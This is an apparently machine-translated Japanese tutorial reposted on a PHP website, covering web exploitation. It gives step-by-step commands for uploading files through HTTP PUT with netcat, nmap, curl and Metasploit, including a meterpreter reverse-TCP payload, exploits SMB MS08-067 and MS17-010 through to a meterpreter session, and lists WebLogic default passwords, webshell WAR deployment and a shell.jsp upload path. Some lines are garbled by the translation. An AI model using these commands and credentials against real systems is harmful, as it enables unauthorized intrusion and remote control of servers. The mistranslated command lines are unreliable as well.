Web 脆弱性悪用態勢の分析例

PHPz
リリース: 2023-05-27 08:55:27
転載
1580 人が閲覧しました

1. HTTP PUT メソッドの活用

PUT はファイル管理に使用されるメソッドであり、運用保守担当者が Web サーバーのデフォルト設定を変更しておらず、引き続きサポートされている場合は、これらのメソッドを使用すると、ファイルをサーバー ファイル システムに自由にアップロードできます。

1.1. Netcat は PUT メソッドを使用します

Netcat は、「NC」と呼ばれ、「スイスの **」として知られる非常に有名なネットワーク ツールです。侵入テストではこう言われています。ポート監視、ポートスキャン、リモートファイル転送、リモートシェルなどの複数の機能を実装できます。

Web サービスで PUT メソッドが有効になっていることを確認した後、次のコマンドを入力してファイルをアップロードします:

nc IP PORT

PUT /dav/hack.txt HTTP /1.1

ホスト: IP

Web 脆弱性悪用態勢の分析例

Enter キーを 2 回押して、hacked.txt ファイルが正常に作成され、ステータス コードが 201 であることを確認します。ファイルの作成場所は /dav/ ディレクトリです。

1.2. Nmap は PUT メソッドを使用します

コマンド:

nmap -p port IP -script http-put-script-args http-put . url='/dav/test.php',http-put.file='/root/test.php'

コマンド説明:

-script http-put //httpを選択- put スクリプト。このスクリプトは、http put メソッドを使用したファイルのアップロードをサポートします。

-script-args //スクリプトパラメータ1と2を設定します

http-put.url='/dav/test.php' //パラメータ1をアップロードターゲットファイルパスとして設定します

http-put.file='/root/test.php' //パラメータ 2 をアップロードのローカル ファイル パスに設定します。

Web 脆弱性悪用態勢の分析例

この図では、Nmap スクリプトによるアップロードが成功したことがわかります。

1.3 BurpSuite は PUT メソッドを使用します

毎日の BurpSuite を使用してアップロード ターゲット パスにアクセスしてデータ パケットをキャプチャし、データ パケットのリクエスト メソッドとアップロード パスを変更し、ファイルのコンテンツをリクエスト本文を作成し、パッケージを Web サーバーに送信します。

Web 脆弱性悪用態勢の分析例

# サーバー応答パケットは、ファイルが正常に作成されたことを示しています。

Web 脆弱性悪用態勢の分析例

1.4 CURL は PUT メソッドを使用します

CURL は、URL 構文を使用してコマンド ラインで動作し、指定されたファイル経由でアップロードまたはダウンロードするファイル転送ツールです。データをURL化して表示します。 curl の c はクライアントを意味し、URL は URL を意味します。

PUT メソッドでファイルを作成するコマンドは次のとおりです。

コマンド 1:

curl -i -XPUT -H "Content -Type: text/plain ; charset=utf-8" -d "hack completed" http://192.168.40.4/dav/hack.php

Web 脆弱性悪用態勢の分析例##コマンド説明:

-i/--include //出力時にプロトコルヘッダー情報を含める

-X/--request //PUTコマンドを指定

-H/- -header

-d/--data //HTTP POST メソッドはテキストを書き込みます 作成されました http://192.168.40.4/dav/hack.php

コマンド 2:

curl -i -X PUT -H " Content-Type:application /xml; charset=utf-8″ -d @”F:\1.php” http://192.168.40.4/dav/hack.php

Web 脆弱性悪用態勢の分析例コマンド説明 :

-d @"filename" //ファイルからコンテンツを読み取ります

Web 脆弱性悪用態勢の分析例##1.5 QuickPuT スクリプトは PUT メソッドを使用します

Python コマンド ライン ツールである QuickPut を使用すると、HTTP PUT メソッドを使用してファイルをサーバーにアップロードできます。

アップロード コマンド:

python2 QuickPut.py F:\1.php http://192.168.40.4/dav/hack1.php

コマンド説明:Web 脆弱性悪用態勢の分析例

python QuickPut.py

1.6 MetasploitはPUTメソッドを使用します

Metasploitの補助モジュールauxiliary/scanner /http/http_put は、ファイルのアップロードと削除の操作を実装できます。

コマンド:

http サービスの補助スキャンに http_put モジュールを使用します

show options //モジュール パラメーターを表示しますWeb 脆弱性悪用態勢の分析例

set RHOSTS 192.168.40.4 //ターゲットIPを設定します

set PATH /dav/ //ターゲットパスを設定します

set payload php/meterpreter/reverse_tcp //攻撃ペイロードを設定

set filename msf.php //アップロードファイル名を設定

Web 脆弱性悪用態勢の分析例

set FILEDATAファイル://root/test.php //ローカル ファイルをアップロードするためのデータ パスを設定します

exploit //攻撃を開始します

Web 脆弱性悪用態勢の分析例

返された結果は次のことを示していますファイルは正常にアップロードされました。

2. SMB 脆弱性悪用

情報収集ポート スキャンを実行した後、ホストでポート 139 と 445 が開いていることがわかり、バナーに Microsoft Windows が表示されます。ポート 445 の SMB 脆弱性、より一般的なものには ms17-010、ms08-067 などが含まれます。

脆弱性の検出

コマンド:

namp --script=/usr/share/nmap/scripts/smb- vuln-ms08-067.nse –sTIP

namp --script=/usr/share/nmap/scripts/smb-vuln-ms17-010.nse –sTIP

コマンド説明:

--script=/usr/share/nmap/scripts/smb-vuln-ms08-067.nse //Nmapms08-067 脆弱性スキャン スクリプトを使用します

-sT //TCP スキャンを使用します

出力結果が次の場合:

smb-vuln-ms08-067:

VULNERABLE:

Microsoft Windows システムはリモートに対して脆弱ですコード実行 (MS08-067)

状態: VULNERABLE

ID: CVE: CVE-2008-4250

Microsoft Windows 2000 SP4、XP SP2、および SP3 のサーバー サービス、 Server 2003 SP1 および SP2、Vista Gold、SP1、Server 2008、および 7 Pre-Beta では、リモート攻撃者が、パス正規化中にオーバーフローを引き起こす細工された RPC リクエストを介して任意のコードを実行することができます。

公開日: 2008-10-23

参考資料:

https://technet.microsoft.com/en-us/library/security/ms08-067.aspx

https://cve.mitre. org /cgi-bin/cvename.cgi?name=CVE-2008-4250

は、ms08-067 脆弱性が存在することを示し、ms17-010 は上記と同じです。

脆弱性の悪用

MSF smb 攻撃モジュールを使用して、ms08-067 および ms17-010 の脆弱性を悪用します。

msf>exploit/windows/smb/ms08_067_netapiを使用します

msfexploit(ms08_067_netapi)>RHOST IPを設定します

msfexploit(ms08_067_netapi)>exploit

[*]ローカル リスニング IP ポート

でリバース TCP ハンドラーを開始しました。ターゲット IP: 445

を自動的に検出しています。[*]ターゲット IP: 445- フィンガープリント: Windows 2000 - Service Pack 0 ~ 4 - lang:English

[*]ターゲット IP:445- 選択されたターゲット: Windows 2000 Universal

[*]ターゲット IP:445- 脆弱性をトリガーしようとしています...

[*]ステージ (957487 バイト) をターゲット IP に送信中です。

[*]Meterpreter セッション 2 が開きました (IP ポートの監視 -> ターゲット ポート バウンス)

meterpreter>

ms17-010 エクスプロイトは上記と同じです。

3.Weblogic の脆弱性悪用

ペネトレーション テストでは、Weblogic Server のアプリケーション サーバーに遭遇することがよくありますが、Weblogic Server を見た後、Weblogic Server にはバックグラウンド管理があるのではないかと考えられます。このバージョンには、弱いパスワード、JAVA 逆シリアル化の脆弱性、任意のファイルのアップロードの脆弱性、およびその他の多くの CVE の脆弱性があります。 Weblogic のさまざまな脆弱性を悪用する方法を共有しましょう。

Web 脆弱性悪用態勢の分析例3.1 バックエンド ログインの弱いパスワード

共通の Weblogic Server ログインの弱いパスワード:

weblogic/weblogic

weblogic/weblogic1

weblogic/weblogic10

weblogic/weblogic123

これが存在する場合は、アプリケーション サーバー管理バックグラウンドにログインし、webshel​​lwar パッケージをアップロードできます。 。

Web 脆弱性悪用態勢の分析例

#アップロード後にアプリケーション サーバーに war パッケージをデプロイします

Web 脆弱性悪用態勢の分析例

Web 脆弱性悪用態勢の分析例

Web 脆弱性悪用態勢の分析例戦争パッケージのアップロードと展開が正常に完了したら、マレーシアを訪れることができます。

3.2 JAVAデシリアライゼーションの脆弱性

#CVE の脆弱性スクリプトを使用して直接検出でき、脆弱性コードに基づいてエクスプロイト スクリプトを見つけることができます。

Weblogic 脆弱性検出スクリプトは非常に強力で、さまざまな CVE、管理バックグラウンド パス、SSRF、脆弱なパスワードを検出でき、後の拡張もサポートします。

Web 脆弱性悪用態勢の分析例

Java 逆シリアル化脆弱性悪用ツールを使用して、直接検出して悪用することもできます。脆弱性ツールは、脆弱性検出、コマンド実行、ファイルアップロード、一括検査機能を提供します。

Web 脆弱性悪用態勢の分析例

3.3 Weblogic 任意のファイル アップロードの脆弱性

Weblogic を爆破して情報を返します。

Web 脆弱性悪用態勢の分析例

ログイン パスワード、サービス名、ランダム文字ディレクトリを取得し、POC を構築してアップロードし、テスト ファイルをアップロードします。

/bea_wls_deployment_internal/DeploymentService パスの下に次のデータを渡します。

Web 脆弱性悪用態勢の分析例

サーバーは、アップロードの成功とファイルの絶対パスを返します。

Web 脆弱性悪用態勢の分析例

#このアップロードされたファイル パスにアクセスした後、アップロードされたファイルの内容を表示します

http://IP/bea_wls_deployment_internal/shell.jsp

Web 脆弱性悪用態勢の分析例

以上がWeb 脆弱性悪用態勢の分析例の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。

関連ラベル:
web
ソース:yisu.com
このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
最新の問題
人気のチュートリアル
詳細>
最新のダウンロード
詳細>
ウェブエフェクト
公式サイト
サイト素材
フロントエンドテンプレート